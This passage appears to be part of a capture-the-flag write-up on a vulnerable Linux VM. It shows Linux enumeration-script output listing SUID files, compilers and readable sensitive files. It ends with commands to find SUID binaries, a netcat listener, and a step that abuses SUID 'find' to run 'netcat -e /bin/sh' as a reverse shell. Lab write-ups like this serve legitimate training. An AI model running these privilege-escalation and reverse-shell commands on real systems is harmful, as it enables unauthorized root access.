 440 -rwxr-xr-x  1 root root 1071 Jun 25  2011 atd
 441 -rwxr-xr-x  1 root root 1276 Oct 16  2012 bootlogs
 442 -rwxr-xr-x  1 root root 1281 Jul 15  2013
 443 -rwxr-xr-x  1 root root 3816 Jul 15  2013
 444 -rwxr-xr-x  1 root root 1099 Jul 15  2013
 445 -rwxr-xr-x  1 root root 9673 Jul 15  2013
 446 -rwxr-xr-x  1 root root 1379 Dec  9  2011 console-setup
 447 -rwxr-xr-x  1 root root 3033 Jul  3  2012 cron
 448 -rwxr-xr-x  1 root root 2813 Feb  6  2015 dbus
 449 -rwxr-xr-x  1 root root 6435 Feb 11  2018 exim4
 450 -rwxr-xr-x  1 root root 1329 Oct 16  2012 halt
 451 -rwxr-xr-x  1 root root 1423 Oct 16  2012
 452 -rwxr-xr-x  1 root root 3880 Dec 10  2012
 453 -rwxr-xr-x  1 root root 7592 Apr 28  2012 kbd
 454 -rwxr-xr-x  1 root root 1591 Oct  1  2012 keyboard-setup
 455 -rwxr-xr-x  1 root root 1293 Oct 16  2012 killprocs
 456 -rwxr-xr-x  1 root root 1990 May 21  2012 kmod
 457 -rwxr-xr-x  1 root root 2405 Sep 26  2016 mcstrans
 458 -rwxr-xr-x  1 root root  995 Oct 16  2012 motd
 459 -rwxr-xr-x  1 root root  670 Feb 24  2013
 460 -rwxr-xr-x  1 root root 2128 Feb 24  2013
 461 -rwxr-xr-x  1 root root 1508 Jul 15  2013
 462 -rwxr-xr-x  1 root root 1413 Jul 15  2013
 463 -rwxr-xr-x  1 root root  678 Feb 24  2013
 464 -rwxr-xr-x  1 root root 2440 Oct 16  2012
 465 -rwxr-xr-x  1 root root 1731 Jul 15  2013
 466 -rwxr-xr-x  1 root root 5437 Apr 19  2018 mysql
 467 -rwxr-xr-x  1 root root 4322 Mar 14  2013 networking
 468 -rwxr-xr-x  1 root root 6491 May 22  2013 nfs-common
 469 -rwxr-xr-x  1 root root 1346 May 20  2012 procps
 470 -rwxr-xr-x  1 root root 6120 Oct 16  2012 rc
 471 -rwxr-xr-x  1 root root  782 Oct 16  2012 rc.local
 472 -rwxr-xr-x  1 root root  117 Oct 16  2012 rcS
 473 -rwxr-xr-x  1 root root  639 Oct 16  2012 reboot
 474 -rwxr-xr-x  1 root root 2727 Sep 26  2016 restorecond
 475 -rwxr-xr-x  1 root root 1074 Jul 15  2013 rmnologin
 476 -rwxr-xr-x  1 root root 2344 May 10  2017 rpcbind
 477 -rwxr-xr-x  1 root root 3054 Oct  8  2014 rsyslog
 478 -rwxr-xr-x  1 root root 3200 Oct 16  2012 sendsigs
 479 -rwxr-xr-x  1 root root  590 Oct 16  2012 single
 480 -rw-r--r--  1 root root 4290 Oct 16  2012 skeleton
 481 -rwxr-xr-x  1 root root 3881 Apr 15  2016 ssh
 482 -rwxr-xr-x  1 root root 8827 Nov  9  2012 udev
 483 -rwxr-xr-x  1 root root 1179 Aug 20  2012 udev-mtab
 484 -rwxr-xr-x  1 root root 2721 Apr 10  2013 umountfs
 485 -rwxr-xr-x  1 root root 2195 Apr 10  2013
 486 -rwxr-xr-x  1 root root 1122 Oct 16  2012 umountroot
 487 -rwxr-xr-x  1 root root 3111 Oct 16  2012 urandom
 488 -rwxr-xr-x  1 root root 1364 Oct 26  2015 virtualbox-guest-utils
 489 -rwxr-xr-x  1 root root 2666 Mar  3  2012 x11-common
 492 [00;31m[-] /etc/init/ config file permissions:[00m
 493 total 48
 494 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 495 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 496 -rw-r--r--  1 root root  523 Mar 14  2013 network-interface-container.conf
 497 -rw-r--r--  1 root root 1603 Mar 14  2013 network-interface-security.conf
 498 -rw-r--r--  1 root root  803 Mar 14  2013 network-interface.conf
 499 -rw-r--r--  1 root root 1898 Mar 14  2013 networking.conf
 500 -rw-r--r--  1 root root  567 Feb 24  2013 startpar-bridge.conf
 501 -rw-r--r--  1 root root  637 Nov  5  2012 udev-fallback-graphics.conf
 502 -rw-r--r--  1 root root  769 Nov  5  2012 udev-finish.conf
 503 -rw-r--r--  1 root root  322 Nov  5  2012 udev.conf
 504 -rw-r--r--  1 root root  356 Nov  5  2012 udevmonitor.conf
 505 -rw-r--r--  1 root root  352 Nov  5  2012 udevtrigger.conf
 508 [00;31m[-] /lib/systemd/* config file permissions:[00m
 509 /lib/systemd/:
 510 total 4.0K
 511 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system
 513 /lib/systemd/system:
 514 total 56K
 515 drwxr-xr-x 2 root root 4.0K Feb 19 22:43
 516 drwxr-xr-x 2 root root 4.0K Feb 19 22:43
 517 drwxr-xr-x 2 root root 4.0K Feb 19 22:43
 518 drwxr-xr-x 2 root root 4.0K Feb 19 22:25
 519 -rw-r--r-- 1 root root  353 Feb 10  2015 dbus.service
 520 -rw-r--r-- 1 root root  106 Feb 10  2015 dbus.socket
 521 -rw-r--r-- 1 root root  190 Oct  8  2014 rsyslog.service
 522 -rw-r--r-- 1 root root  164 Apr 29  2013 udev-control.socket
 523 -rw-r--r-- 1 root root  177 Apr 29  2013 udev-kernel.socket
 524 -rw-r--r-- 1 root root  752 Apr 29  2013 udev-settle.service
 525 -rw-r--r-- 1 root root  291 Apr 29  2013 udev-trigger.service
 526 -rw-r--r-- 1 root root  384 Apr 29  2013 udev.service
 527 -rw-r--r-- 1 root root  155 Apr 16  2013 acpid.service
 528 -rw-r--r-- 1 root root  115 Apr 16  2013 acpid.socket
 530 /lib/systemd/system/
 531 total 0
 532 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
 534 /lib/systemd/system/
 535 total 0
 536 lrwxrwxrwx 1 root root 15 Feb 10  2015 dbus.service -> ../dbus.service
 538 /lib/systemd/system/
 539 total 0
 540 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
 541 lrwxrwxrwx 1 root root 22 Apr 29  2013 udev-control.socket -> ../udev-control.socket
 542 lrwxrwxrwx 1 root root 21 Apr 29  2013 udev-kernel.socket -> ../udev-kernel.socket
 544 /lib/systemd/system/
 545 total 0
 546 lrwxrwxrwx 1 root root 23 Apr 29  2013 udev-trigger.service -> ../udev-trigger.service
 547 lrwxrwxrwx 1 root root 15 Apr 29  2013 udev.service -> ../udev.service
 550 [00;33m### SOFTWARE #############################################[00m
 551 [00;31m[-] MYSQL version:[00m
 552 mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2
 555 [00;31m[-] Apache user configuration:[00m
 556 APACHE_RUN_USER=www-data
 557 APACHE_RUN_GROUP=www-data
 560 [00;33m### INTERESTING FILES ####################################[00m
 561 [00;31m[-] Useful file locations:[00m
 562 /bin/nc
 563 /bin/netcat
 564 /usr/bin/wget
 565 /usr/bin/gcc
 566 /usr/bin/curl
 569 [00;31m[-] Installed compilers:[00m
 570 ii  checkpolicy                        2.1.8-2                          i386         SELinux policy compiler
 571 ii  gcc                                4:4.7.2-1                        i386         GNU C compiler
 572 ii  gcc-4.7                            4.7.2-5                          i386         GNU C compiler
 573 ii  gcc-4.7-multilib                   4.7.2-5                          i386         GNU C compiler (multilib files)
 574 ii  gcc-multilib                       4:4.7.2-1                        i386         GNU C compiler (multilib files)
 577 [00;31m[-] Can we read/write sensitive files:[00m
 578 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
 579 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
 580 -rw-r--r-- 1 root root 851 Jul 30  2011 /etc/profile
 581 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
 584 [00;31m[-] SUID files:[00m
 585 -rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
 586 -rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
 587 -rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
 588 -rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
 589 -rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
 590 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
 591 -rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
 592 -rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
 593 -rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
 594 -rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
 595 -rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
 596 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
 597 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
 598 -rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
 599 -rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
 600 -rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
 601 -rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
 602 -rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 603 -rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs
 606 [00;33m[+] Possibly interesting SUID files:[00m
 607 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
 610 [00;31m[-] SGID files:[00m
 611 -rwxr-sr-x 1 root ssh 128396 Jan 27  2018 /usr/bin/ssh-agent
 612 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
 613 -rwxr-sr-x 1 root mlocate 30492 Sep 25  2010 /usr/bin/mlocate
 614 -rwxr-sr-x 1 root mail 17908 Nov 18  2017 /usr/bin/lockfile
 615 -rwxr-sr-x 1 root shadow 49364 Feb 27  2017 /usr/bin/chage
 616 -rwxr-sr-x 1 root tty 9708 Jun 11  2012 /usr/bin/bsd-write
 617 -rwxr-sr-x 1 root mail 9768 Nov 30  2014 /usr/bin/mutt_dotlock
 618 -rwxr-sr-x 1 root tty 18020 Dec 10  2012 /usr/bin/wall
 619 -rwxr-sr-x 1 root crontab 34760 Jul  4  2012 /usr/bin/crontab
 620 -rwxr-sr-x 1 root shadow 18168 Feb 27  2017 /usr/bin/expiry
 621 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
 622 -rwxr-sr-x 1 root mail 13960 Dec 12  2012 /usr/bin/dotlockfile
 623 -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
 624 -rwxr-sr-x 1 root shadow 30332 May  5  2012 /sbin/unix_chkpwd
 627 [-] Can't search *.conf files as no keyword was entered
 629 [-] Can't search *.php files as no keyword was entered
 631 [-] Can't search *.log files as no keyword was entered
 633 [-] Can't search *.ini files as no keyword was entered
 635 [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
 636 -rw-r--r-- 1 root root 45 May  7 01:08 /etc/resolv.conf
 637 -rw-r--r-- 1 root root 346 Mar 31  2012 /etc/discover-modprobe.conf
 638 -rw-r--r-- 1 root root 216 Sep 26  2016 /etc/sestatus.conf
 639 -rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
 640 -rw-r--r-- 1 root root 834 Jun  8  2012 /etc/gssapi_mech.conf
 641 -rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
 642 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
 643 -rw-r--r-- 1 root root 3173 Dec 16  2017 /etc/reportbug.conf
 644 -rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
 645 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
 646 -rw-r--r-- 1 root root 284 Sep 25  2010 /etc/updatedb.conf
 647 -rw-r--r-- 1 root root 191 Feb  1  2012 /etc/libaudit.conf
 648 -rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
 649 -rw-r--r-- 1 root root 2940 Feb 12  2016 /etc/gai.conf
 650 -rw-r--r-- 1 root root 2632 Oct  8  2014 /etc/rsyslog.conf
 651 -rw-r--r-- 1 root root 2082 May 20  2012 /etc/sysctl.conf
 652 -rw-r--r-- 1 root root 214 May 11  2013 /etc/idmapd.conf
 653 -rw-r--r-- 1 root root 956 Feb 22  2015 /etc/mke2fs.conf
 654 -rw-r--r-- 1 root root 552 Apr 30  2012 /etc/pam.conf
 655 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
 656 -rw-r--r-- 1 root root 2969 Dec 26  2012 /etc/debconf.conf
 657 -rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
 658 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/
 659 -rw-r--r-- 1 root root 475 Aug 29  2006 /etc/nsswitch.conf
 662 [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
 663 /home/flag4/.bash_history
 664 cd 
 665 ls
 666 vi flag4.txt
 667 ls
 668 exit
 671 [00;31m[-] Any interesting mail in /var/mail:[00m
 672 total 8
 673 drwxrwsr-x  2 root mail 4096 Feb 19 22:24 .
 674 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..
 677 [00;33m### SCAN COMPLETE ####################################[00m
View Code



find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;





root@panli:~# nc -lvvp 8999
listening on [any] 8999 ...

在meterpreter的shell中执行find suidtest -exec netcat -e /bin/sh 8999 \;



